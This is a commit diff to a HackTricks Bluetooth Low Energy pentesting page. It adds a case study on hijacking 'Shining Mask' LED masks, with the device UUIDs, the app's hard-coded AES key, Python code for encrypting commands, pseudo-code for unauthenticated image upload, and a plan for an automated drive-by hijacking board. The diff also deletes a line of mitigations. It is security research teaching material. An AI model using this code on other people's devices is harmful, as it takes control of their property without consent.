Add content from: Invasion of the Face Changers: Halloween Hijinks with Blueto...

HackTricks News Bot · HackTricks News Bot · commit af7037fe3dc0 · 2025-10-30T13:03:40.000Z
diff --git a/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
@@ -35,6 +35,9 @@ spooftooph -i hci0 -a 11:22:33:44:55:66
 **GATTool** allows to **establish** a **connection** with another device, listing that device’s **characteristics**, and reading and writing its attributes.\
 GATTTool can launch an interactive shell with the `-I` option:
 
+<details>
+<summary>GATTTool interactive usage and examples</summary>
+
 ```bash
 gatttool -i hci0 -I
 [ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
@@ -56,6 +59,8 @@ gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read
 gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c
 ```
 
+</details>
+
 ### Bettercap
 
 ```bash
@@ -80,6 +85,9 @@ Hardware: a Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) re-flashed with NC
 
 Install Sniffle and its Wireshark extcap on Linux:
 
+<details>
+<summary>Install Sniffle extcap (Linux)</summary>
+
 ```bash
 if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then
   echo "[+] - Sniffle not installed! Installing at 1.10.0..."
@@ -99,6 +107,8 @@ else
 fi
 ```
 
+</details>
+
 Flash Sonoff with Sniffle firmware (ensure your serial device matches, e.g. /dev/ttyUSB0):
 
 ```bash
@@ -145,6 +155,9 @@ Once you’ve identified a writable characteristic handle and value from the sni
 
 - Automate on Windows with a Nordic dongle using Python + blatann:
 
+<details>
+<summary>Python blatann write example (Windows + Nordic dongle)</summary>
+
 ```python
 import time
 import blatann
@@ -185,11 +198,87 @@ peer.wait_for_disconnect()
 ble_device.close()
 ```
 
-### Operational notes and mitigations
+</details>
+
+### Case study: hijacking BLE LED masks (Shining Mask family)
+
+Cheap, white‑labeled BLE LED masks controlled by the “Shining Mask” app accept write control from any nearby central with no pairing/bonding. The app talks GATT to a command characteristic and a data characteristic; commands are AES‑ECB encrypted with a static key hard‑coded in the app, while bulk image data is unencrypted.
+
+Key UUIDs on these devices:
+- Command write characteristic: d44bc439-abfd-45a2-b575-925416129600
+- Notify characteristic: d44bc439-abfd-45a2-b575-925416129601
+- Image data characteristic: d44bc439-abfd-45a2-b575-92541612960a
+
+Unauthenticated GATT writes
+- No pairing/bonding required. Any host can connect and write to the command UUID to change brightness, select images, start animations, etc.
+- Common ops observed: LIGHT (brightness), IMAG (select index), DELE (delete indices), SPEED, ANIM, PLAY, CHEC (query count), DATS (begin upload).
+
+Static-key AES command framing
+- Frame = 1‑byte length, ASCII op (e.g., b"LIGHT"), args, pad to 16, AES‑ECB encrypt with static key from the app.
+- Known static key (hex): 32672f7974ad43451d9c6c894a0e8764
+
+Python helper to encrypt and send a command (example: set max brightness):
+
+```python
+from Crypto.Cipher import AES
+from binascii import unhexlify
+
+KEY = unhexlify('32672f7974ad43451d9c6c894a0e8764')
+
+def enc_cmd(op, args=b''):
+    body = bytes([len(op) + len(args)]) + op.encode() + args
+    body += b'\x00' * ((16 - (len(body) % 16)) % 16)
+    return AES.new(KEY, AES.MODE_ECB).encrypt(body)
+
+packet = enc_cmd('LIGHT', b'\xff')
+# Write 'packet' to d44bc439-abfd-45a2-b575-925416129600
+```
+
+Image upload flow
+- After an encrypted DATS handshake, raw chunks are written unencrypted to the data characteristic …960a.
+- Packet format: [len][seq][payload]. Empirically ~100 bytes payload per packet works reliably.
+
+<details>
+<summary>Minimal image upload pseudo-code</summary>
+
+```python
+# Start upload (encrypted): two bytes size, two bytes index, one toggle byte
+img_index = b'\x01\x00'  # index 1
+img_size  = (len(img_bytes)).to_bytes(2, 'big')
+start     = enc_cmd('DATS', img_size + img_index + b'\x01')
+write_cmd_char(start)  # expect DATSOK on notify char
+
+# Stream raw chunks (unencrypted) to ...960a: [len][seq][payload]
+seq = 0
+CHUNK = 98  # data bytes per packet (≈100 total incl. len+seq)
+for off in range(0, len(img_bytes), CHUNK):
+    chunk = img_bytes[off:off+CHUNK]
+    pkt = bytes([len(chunk)+1, seq & 0xff]) + chunk
+    write_data_char(pkt)
+    seq += 1
+
+# Optionally signal completion if firmware expects it (e.g., DATCP)
+```
+
+</details>
+
+Reversing the app protocol quickly
+- Extract the static AES key by decompiling the Android APK (e.g., with JADX). Search for AES, ECB, and the above UUIDs; keys are typically in helper classes.
+- Capture Android Bluetooth HCI snoop logs to map commands and UUIDs to user actions. Enable “Bluetooth HCI snoop log” in Developer options, reproduce actions, then pull btsnoop_hci logs and decode with Wireshark to see ATT Write Commands/Notifications.
+
+Hands‑free drive‑by hijacking
+- Program a small BLE dev board (e.g., Adafruit Feather nRF52840 running CircuitPython) to:
+  1) scan for devices exposing the command UUID,
+  2) connect, send DATS + upload an image to an unused slot,
+  3) select it with IMAG and set LIGHT/SPEED/PLAY,
+  4) disconnect and continue scanning.
+- The hardware and full CircuitPython reference code are publicly available; see references.
+
+
+## Operational notes
 
 - Prefer Sonoff+Sniffle on Linux for robust channel hopping and connection following. Keep a spare Nordic sniffer as a backup.
 - Without pairing/bonding, any nearby attacker can observe writes and replay/craft their own to unauthenticated writable characteristics.
-- Mitigations: require pairing/bonding and enforce encryption; set characteristic permissions to require authenticated writes; minimize unauthenticated writable characteristics; validate GATT ACLs with Sniffle/nRF Connect.
 
 ## References
 
@@ -200,5 +289,9 @@ ble_device.close()
 - [Nordic nRF Sniffer for Bluetooth LE](https://www.nordicsemi.com/Products/Development-tools/nRF-Sniffer-for-Bluetooth-LE)
 - [nRF Connect for Desktop](https://www.nordicsemi.com/Products/Development-tools/nRF-Connect-for-desktop)
 - [blatann – Python BLE library for Nordic devices](https://blatann.readthedocs.io/en/latest/)
+- [Invasion of the Face Changers: Halloween Hijinks with Bluetooth LED Masks (Bishop Fox)](https://bishopfox.com/blog/invasion-of-the-face-changers-halloween-hijinks-with-bluetooth-led-masks)
+- [Shining Mask BLE protocol notes (BrickCraftDream)](https://github.com/BrickCraftDream/Shining-Mask-stuff/blob/main/ble-protocol.md)
+- [Android Bluetooth HCI snoop logging](https://source.android.com/docs/core/connect/bluetooth/verifying_debugging)
+- [Adafruit Feather nRF52840 Express](https://www.adafruit.com/product/4062)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
